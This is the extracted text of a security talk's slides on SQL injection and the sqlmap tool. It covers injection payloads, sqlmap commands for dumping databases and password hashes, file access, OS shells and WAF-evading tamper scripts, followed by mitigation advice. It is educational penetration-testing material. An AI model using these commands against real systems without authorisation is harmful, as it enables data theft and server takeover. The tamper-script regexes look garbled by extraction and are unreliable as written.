Sql injection with sqlmap

SQL injection with sqlmap
Herman Duarte <hcoduarte@gmail.com>

Tuesday, December 4, 12 1

About me

Consultant @ INTEGRITY S.A. - www.integrity.pt
Penetration testing engagements
BSc in Information Systems and Computer Engineering
CISSP Associate / ISO27001LA / CCNA
Security addict :)


Roadmap

SQL injection (SQLi) 101
sqlmap
Mitigation techniques
Wrap-up


SQLi 101: Definition
Definition:
SQL injection occurs when it is possible to inject SQL
commands in data-plane input in order to affect the
execution of predefined SQL statements
It affects any application that uses non-sanitized user-supplied
input, in dynamic SQL query constructions (e.g. web apps, fat
clients)
Cause:
Bad programming practices + Lack of knowledge/
awareness


SQLi 101: Structure
...?name=robert’ union all select null,@@version,null #

Preﬁx Payload Sufﬁx
$query = “SELECT name,status,age FROM user WHERE
name=’” . $_REQUEST[‘search’] . “‘ AND age > 42”;


sqlmap
Developed in python
Prerequisites to run sqlmap:
Python 2.6.x or 2.7.x
To install:
git clone https://github.com/sqlmapproject/sqlmap.git sqlmap

To update:
python sqlmap.py --update
git pull


sqlmap
Mainly developed by:

Bernardo Damele A.G. Miroslav Stampar
(@inquisb) (@stramparm)


sqlmap: Scenarios

Find and explore SQL injection in web applications

Direct connection (database account is needed)
DBMS python binding installed (e.g. PyMySQL)
-d <dbms>://<user>:<password>@<ip>:<port>/<db_name>


sqlmap: Workﬂow
Select your target
Identify possible injection points
Identify SQLi vulnerabilities:
By using sqlmap
Manual testing :)
Exploit SQLi vunerabilities:
Enumerate
File system access
OS pwnage
Own the internal network (w00t! w00t!)


sqlmap: Target selection
-u “<url>” (e.g. https://webapp.com/news.php?id=1)
-r <request ﬁle>
GET /news.php?id=1&Submit=Submit HTTP/1.1
Host: webapp.com
User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deﬂate
Proxy-Connection: keep-alive
Referer: https://webapp.com/index.php
Cookie: PHPSESSID=l7uo2lheu067qrs8fjj0bab777;
DNT: 1


sqlmap: Injection points

GET parameters
POST parameters
Cookie header values (only if --level >= 2)
User-Agent header value (only if --level >= 3)
Referer header value (only if --level >= 3)


sqlmap: Finding SQLi (I)
./sqlmap.py -u “https://webapp.com/news.php?id=1”
or
./sqlmap.y -r news_get_request --force-ssl
Default behavior:
Tests all GET and/or POST parameters, for all SQLi
types, for all databases (if not discovered during tests)
Yes it may take a long time, and it doesn’t cover all tests
sqlmap can do.


sqlmap: Finding SQLi (II)
--level=<level> (1...5 - default is 1)
With --level=5 every combination of payload, preﬁx and sufﬁx
will be tested on all injection points available (noisier but gives
more coverage)
--risk=<risk> (0...3) - default is 1)
To do tests using OR --risk=3. Why? Imagine this:
UPDATE user SET disabled=1 WHERE email=email@email.com OR 1=1#

-p <param to test>[, <param to test>]


sqlmap: SQLi techniques/types
--technique=SU (default is all of them: BEUST)
Boolean-based blind
Based on page changes, data is inferred, char by char
Error-based
Uses the errors that are displayed to extract data
Union query-based
Changes the SQL queries to extract data
Stacked queries
Semi-colon are used to inject multiple statements on the SQL query
Time-based blind
Based on time, data is inferred, char by char


sqlmap: Supported DBMSs
--dbms=mssql | mysql | postgresql | oracle ...

Microsoft SQL Server SAP MaxDB
MySQL Sybase
PostgreSQL Firebird
Oracle SQLite
IBM DB2 Microsoft Access


sqlmap: Logging / Verbosity

Logs all HTTP traffic in a text file: -t <output file>
Save options used in command line: --save <file>
Verbosity :
-v <0..6> (default 1)
-v 6 same as -t but, output to console


sqlmap: Enumeration (I)
Objective:
Get data from the DBMS tables (limited the privileges the current
DBMS user have)
What can you get:
DBMS exact version, O.S. information, architecture and patch level: -f
DBMS banner: -b
DBMS server hostname: --hostname
DBMS user the application is using: --current-user
Applications current DB: --current-db
If the current user is a DBA: --is-dba


sqlmap: Enumeration (II)
What can you get:
...
List the DBMS users: --users
List all DBMS users, password hashes: --passwords
sqlmap will automatically try to crack the hashes with a dictionary
attack
List users privileges: --privileges
List all available databases: --dbs
List all tables or just for a speciﬁc database:
--tables (-D <database name>)


sqlmap: Enumeration (III)
What can you get:
...
List all columns or just for a speciﬁc table from that database:
--columns (-T <table name> -D <db name>)
Count table entries: --count
Dump data from a database/table/column:
--dump (-D, -T, -C can be used to select what data to dump)
--dump-all (I don’t recommend it)
Search for a speciﬁc or part of a database name, table name or column
name:
--search= (-D, -T, -C to specify what to search)


sqlmap: Enumeration (IV)
What can you get:
...
Executing a custom SQL query:
--sql-query=”<sql query to execute>”
Interactive SQL shell to execute all your custom
SQL queries:
--sql-shell


sqlmap: File system access
Objective:
Read and write any textual or binary file from the DBMS O.S.
Prerequisites:
DBMS = mssql | mysql | postgresql
Current DBMS user must have the necessary privileges
Read:
--file-read=”<file path>”
Write:
--file-write=”<file local path>”
--file-dest=”<remote file location path>”


sqlmap: OS pwnage (I)
Objective:
Get access to the DBMS O.S. and the Internal network (if DBMS server in the
internal network)
Prerequisites:
DBMS = mssql | mysql | postgresql
Current DBMS user must have the necessary privileges
What can you do?
Get a reverse shell if the DB can:
connect to the internet
ping your server (yes an icmp shell :))
Establish a VNC connection


sqlmap: OS pwnage (II)
To execute an OS command:
--os-cmd=”<command to execute>”
To get an OS shell: --os-shell
To get a meterpreter shell, an icmpshell or VNC:
--os-pwn
--msf-path=”<msf path>”
Store procedure privilege escalation (buffer overﬂow):
--bof


sqlmap: Tamper scripts
Tamper scripts:
--tamper <script ﬁle path>[,<script ﬁle path>]
tamper/bluecoat.py

def tamper(payload, headers=None):
Example:
* Input: SELECT id FROM users where id = 1
* Output: SELECT%09id FROM users where id LIKE 1

Requirement:
* MySQL, Blue Coat SGOS with WAF activated as documented in
https://kb.bluecoat.com/index?page=content&id=FAQ2147

if payload:
retVal = re.sub(r"(?i)(SELECT|UPDATE|INSERT|DELETE)s+", r"g<1>t", payload)
retVal = re.sub(r"s*=s*", " LIKE ", retVal)


sqlmap

DEMO


sqlmap: Tips
If HTTPS is being used, don’t forget to set: --force-ssl
Get the most info as you can before starting to ﬁnd SQLi
vulnerabilities. It will save you time.
Union-based gives more data with less requests, use it
Time-based blind SQLi is faster to check in comparison to
Union-based query (in cases where a lot of columns are
used)
If --is-dba=true, --technique=S you can start to gangnam
style


Mitigation Techniques
Sanitize input
Use prepared statements / bind variables
Conﬁgure DBMS users conﬁgured with least-privilege
principle in mind
Use generic errors don’t pass them to the user
In case the web application source code can’t be
changed, a proxy can be used, between the web
server and the database server (e.g. GreenSQL)


Wrap-up

Input sanitization
Use prepared statements
Least-privilege principle is your friend (use it!)
Have I said to use prepared statements ?! :)
Do code reviews


References
https://sqlmap.org
Advanced SQL injection to operating system full
control - http://www.slideshare.net/inquis/advanced-
sql-injection-to-operating-system-full-control-
whitepaper-4633857
SQL Injection Attacks and Defenses - http://
www.amazon.com/Injection-Attacks-Defense-Justin-
Clarke/dp/1597494240


Thank You!

Q&A
Herman Duarte
@hdontwit
https://www.linkedin.com/in/hcoduarte
hcoduarte@gmail.com


Sql injection with sqlmap

In this document

More Related Content

What's hot

Similar to Sql injection with sqlmap

Sql injection with sqlmap